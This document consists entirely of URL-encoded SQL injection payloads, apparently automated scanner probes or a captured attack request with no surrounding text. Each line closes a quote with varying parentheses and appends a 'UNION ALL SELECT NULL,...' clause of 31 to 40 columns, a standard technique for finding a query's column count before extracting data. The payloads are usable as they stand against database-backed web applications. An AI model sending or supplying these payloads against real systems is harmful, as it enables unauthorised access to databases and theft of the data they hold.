1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%27%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%29%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 1234.5%22%29%20UNION%20ALL%20SELECT%20NULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL%2CNULL--%20 